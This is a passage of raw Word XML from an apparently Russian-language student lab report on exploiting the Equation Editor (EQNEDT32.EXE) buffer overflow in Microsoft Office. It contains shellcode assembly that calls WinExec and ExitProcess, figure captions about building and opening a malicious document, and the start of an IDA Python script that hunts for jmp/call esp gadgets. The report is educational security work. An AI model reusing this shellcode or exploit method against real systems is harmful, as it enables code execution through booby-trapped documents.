        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ecx,DWORD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F107BF" w14:textId="71797475" w:rsidR="0065348E" w:rsidRPr="00527FA7" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PTR</w:t>
      </w:r>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">]  ; </w:t>
      </w:r>
      <w:r w:rsidR="00527FA7" w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Получ</w:t>
      </w:r>
      <w:r w:rsidR="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ение</w:t>
      </w:r>
      <w:r w:rsidR="00527FA7" w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>указателя</w:t>
      </w:r>
      <w:r w:rsidRPr="00527FA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> на таблицу функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C3141D" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="007C4A57" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cx</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Смещение к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DE75B53" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ebx,ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5FA7613B" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A0BCC" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AB35226" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t>mov esi,0x12723e64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6348C2" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="007C4A57" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C4A57">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">           ; Получаем реальный адрес</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB02DB" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t>call DWORD PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>]  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Вызов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DD9773A" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ABFECF2" w14:textId="77777777" w:rsidR="0065348E" w:rsidRPr="0065348E" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">sub si,0x4c         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve">  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Смещение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3455E7FF" w14:textId="3FF1E9F0" w:rsidR="0065348E" w:rsidRPr="007C4A57" w:rsidRDefault="0065348E" w:rsidP="0065348E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r w:rsidRPr="0065348E">
        <w:t>call DWORD PTR [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>]  ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Вызов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0065348E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0065348E">
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AE1106C" w14:textId="348CAA40" w:rsidR="00A145B4" w:rsidRDefault="00876189" w:rsidP="00132AA2">
      <w:r w:rsidRPr="00876189">
        <w:t xml:space="preserve">Equation.3 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00876189">
        <w:t>- это</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00876189">
        <w:t xml:space="preserve"> OLE-объект Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00876189">
        <w:t>Equation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00876189">
        <w:t xml:space="preserve"> Editor 3.0, компонент для работы с математическими формулами.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A145B4">
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidR="00A145B4" w:rsidRPr="00A145B4">
        <w:t xml:space="preserve">омпонент EQNEDT32.EXE запускал собственный процесс вне основного процесса Office, который не использовал ни </w:t>
      </w:r>
      <w:r w:rsidR="00A145B4" w:rsidRPr="00A145B4">
        <w:lastRenderedPageBreak/>
        <w:t>одну из функций безопасности, добавленных в Windows 10 или пакет Office</w:t>
      </w:r>
      <w:r w:rsidR="00A145B4">
        <w:t>, как показано на</w:t>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:instrText xml:space="preserve"> REF _Ref212472488 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00E24F20">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A145B4" w:rsidRPr="00A145B4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBAB2A" w14:textId="77777777" w:rsidR="00A145B4" w:rsidRDefault="00A145B4" w:rsidP="00A145B4">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EBF7386" wp14:editId="20930A2A">
            <wp:extent cx="4072255" cy="737425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A1C7" w14:textId="7D2FAFA0" w:rsidR="00A145B4" w:rsidRDefault="00A145B4" w:rsidP="00F27392">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Ref2124724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29</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:t xml:space="preserve"> – К</w:t>
      </w:r>
      <w:r w:rsidRPr="00A145B4">
        <w:t>омпонент EQNEDT32.EXE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED1F06" w14:textId="77777777" w:rsidR="00A145B4" w:rsidRDefault="00A145B4" w:rsidP="00132AA2"/>
    <w:p w14:paraId="744DF159" w14:textId="4D8DEAE7" w:rsidR="005B5437" w:rsidRPr="000B6B6A" w:rsidRDefault="000B6B6A" w:rsidP="00132AA2">
      <w:r>
        <w:t>Исполнение скрипта показано на</w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:instrText xml:space="preserve"> REF _Ref212472505 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>, результат открытия документа, содержащего вредоносный компонент, показано на</w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:instrText xml:space="preserve"> REF _Ref212472546 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:t xml:space="preserve">рисунке </w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="001B1DDF">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA6A27" w14:textId="77777777" w:rsidR="000B6B6A" w:rsidRDefault="00FA4791" w:rsidP="000B6B6A">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA4791">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC9C886" wp14:editId="6B0243E9">
            <wp:extent cx="6300470" cy="302260"/>
            <wp:effectExtent l="0" t="0" r="508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5420" w14:textId="30F46CD3" w:rsidR="00196072" w:rsidRDefault="000B6B6A" w:rsidP="000B6B6A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Ref2124725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15DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:t xml:space="preserve"> – Создание документа с вредоносным содержимым</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A06433" w14:textId="77777777" w:rsidR="000B6B6A" w:rsidRPr="000B6B6A" w:rsidRDefault="000B6B6A" w:rsidP="000B6B6A"/>
    <w:p w14:paraId="77EBCEDE" w14:textId="77777777" w:rsidR="00EB15DE" w:rsidRDefault="00196072" w:rsidP="00EB15DE">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00196072">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2684D853" wp14:editId="719F4993">
            <wp:extent cx="3310467" cy="4832441"/>
            <wp:effectExtent l="0" t="0" r="444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5291" cy="48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D385" w14:textId="38918553" w:rsidR="00196072" w:rsidRPr="00E177D5" w:rsidRDefault="00EB15DE" w:rsidP="009721F7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Ref2124725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bookmarkEnd w:id="21"/>
      <w:r>
        <w:t xml:space="preserve"> – Результат открытия файла с внедренной командой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18801B79" w14:textId="77777777" w:rsidR="004663D8" w:rsidRPr="00E41C36" w:rsidRDefault="004663D8" w:rsidP="002235B3"/>
    <w:p w14:paraId="6BC69721" w14:textId="77777777" w:rsidR="00423F4A" w:rsidRDefault="00423F4A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14:paraId="0E2A4786" w14:textId="06D67156" w:rsidR="003A6509" w:rsidRDefault="003A6509" w:rsidP="003A6509">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74E169" w14:textId="56F8803B" w:rsidR="00D024BC" w:rsidRPr="003C73A6" w:rsidRDefault="00D33663" w:rsidP="00D024BC">
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения лабораторной работы были изучены механизмы эксплуатации уязвимости переполнения буфера, защитные средства и методы их обхода. </w:t>
      </w:r>
      <w:r w:rsidR="00980DEC">
        <w:t xml:space="preserve">Разработана схема эксплуатации уязвимости, найденной </w:t>
      </w:r>
      <w:r w:rsidR="003C73A6">
        <w:t>в лабораторной работе №1, произведена демонстрация возможности выполнения сторонней полезной нагрузки путем модификации конфигурационного файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9C6B3" w14:textId="59212726" w:rsidR="00CF15BE" w:rsidRDefault="00CF15BE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7E7C986" w14:textId="7723A979" w:rsidR="00C93DCC" w:rsidRDefault="00CF15BE" w:rsidP="00CF15BE">
      <w:pPr>
        <w:pStyle w:val="af9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение А</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E297601" w14:textId="3B86A12A" w:rsidR="00CF15BE" w:rsidRPr="004D4772" w:rsidRDefault="00CF15BE" w:rsidP="00CF15BE">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4772">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidR="00676862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="00676862" w:rsidRPr="004D4772">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00676862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00676862" w:rsidRPr="004D4772">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00676862">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002506E0" w:rsidRPr="004D4772">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E5A2F" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idautils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6086BDA6" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idaapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C267DD2" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BB5A612" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B0F700" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>OPCODES = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A009B82" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="445AA244" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="640FF4F3" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5334FDD8" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
